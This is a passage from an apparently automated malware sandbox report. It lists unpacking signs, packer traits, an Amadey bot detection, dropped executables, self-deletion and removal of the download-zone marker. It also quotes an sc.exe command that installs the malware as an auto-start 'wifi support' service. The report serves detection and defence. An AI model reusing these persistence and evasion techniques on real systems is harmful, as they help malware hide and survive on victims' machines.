                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: C:\gebofa\95.pdb source: 0Cjy7Lkv1A.exe, 00000000.00000002.361830402.0000000000414000.00000002.00020000.sdmp, 0Cjy7Lkv1A.exe, 00000000.00000000.353857119.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000C.00000000.448285897.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000C.00000002.459349671.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000D.00000000.455076610.0000000000414000.00000002.00020000.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: C:\sejuyupe34\tehajogim\xabed.pdb source: A8FB.exe, 00000013.00000000.474529040.0000000000413000.00000002.00020000.sdmp, A8FB.exe, 00000013.00000002.499568832.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000002.510363795.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000000.499129380.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 60C2.exe, 0000000E.00000002.521453643.0000000000413000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.454922843.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.520151138.0000000004F70000.00000002.00020000.sdmp

                          Data Obfuscation:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeUnpacked PE file: 17.2.7063.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeUnpacked PE file: 19.2.A8FB.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeUnpacked PE file: 36.2.szdcdkt.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeUnpacked PE file: 17.2.7063.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeUnpacked PE file: 19.2.A8FB.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeUnpacked PE file: 36.2.szdcdkt.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Yara detected BatToExe compiled binaryShow sources
                          Source: Yara matchFile source: 00000031.00000003.584625653.0000000000A90000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.584698549.00000000023D0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.584668471.0000000000A97000.00000004.00000040.sdmp, type: MEMORY
                          .NET source code contains method to dynamically call methods (often used by packers)Show sources
                          Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.2.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.0.B3BA.exe.250000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.0.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.0.B3BA.exe.250000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.0.B3BA.exe.250000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00403963 push ecx; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00413104 push eax; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00404D99 push ecx; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00453C66 push esi; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00453C01 push esi; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00463634 push es; iretd
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00523C66 push esi; ret
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00523C01 push esi; ret
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00533634 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0207123C push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0207127E push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0207735E push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_020753C8 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00533A79 push 0000002Bh; iretd
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00531283 push ds; ret
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_00378508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_0037764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_00D84003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BC0D8C push E86DC443h; retf
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 41_2_00258508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 41_2_0025764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 42_2_009B8508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 42_2_009B764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 42_2_02D73C58 push esp; iretd
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_0040A7EE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: 8B25.exe.5.drStatic PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
                          Source: 8B25.exe.5.drStatic PE information: section name: .didata
                          Source: 9874.exe.5.drStatic PE information: section name: .code
                          Source: 382E.exe.5.drStatic PE information: section name: .gizi
                          Source: 382E.exe.5.drStatic PE information: section name: .bur
                          Source: 382E.exe.5.drStatic PE information: section name: .wob
                          Source: 5126.exe.5.drStatic PE information: section name: .code
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name: .T3QbYgM
                          Source: 6674.exe.5.drStatic PE information: section name: .adata
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                          Source: 5126.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x5e577
                          Source: 6674.exe.5.drStatic PE information: real checksum: 0x361362 should be: 0x3775f1
                          Source: 9874.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x60613
                          Source: B3BA.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                          Source: initial sampleStatic PE information: section name: entropy: 7.9969707961
                          Source: initial sampleStatic PE information: section name: entropy: 7.91194455639
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22501727341
                          Source: initial sampleStatic PE information: section name: .T3QbYgM entropy: 7.91938761659
                          Source: B3BA.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.0.B3BA.exe.370000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 20.0.B3BA.exe.370000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.0.B3BA.exe.370000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 20.0.B3BA.exe.370000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.2.B3BA.exe.370000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.0.B3BA.exe.370000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.2.B3BA.exe.250000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.2.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.0.B3BA.exe.250000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.0.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.0.B3BA.exe.250000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                          Persistence and Installation Behavior:

                          barindex
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Drops executables to the windows directory (C:\Windows) and starts themShow sources
                          Source: unknownExecutable created and started: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ujhcrdaJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B3BA.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeFile created: C:\Users\user\AppData\Local\Temp\szdcdkt.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8B25.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8008.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1BCC.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7063.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9874.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A8FB.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\382E.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5126.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe (copy)Jump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\60C2.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ujhcrdaJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6674.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\uuqefjyt
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          barindex
                          Deletes itself after installationShow sources
                          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\0cjy7lkv1a.exeJump to behavior
                          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ujhcrda:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_0040C2E0 CreateDCompositionHwndTarget,CreateDCompositionHwndTarget,GetProcAddress,GetProcAddress,GetProcAddress,ClipCursor,ClipCursor,GetProcAddress,DwmKernelStartup,DwmKernelStartup,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DwmGetRemoteSessionOcclusionEvent,DwmGetRemoteSessionOcclusionEvent,LoadLibraryA,DelegateInput,DelegateInput,LoadLibraryA,EnableNonClientDpiScaling,EnableNonClientDpiScaling,GetProcAddress,GetProcAddress,
                          Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
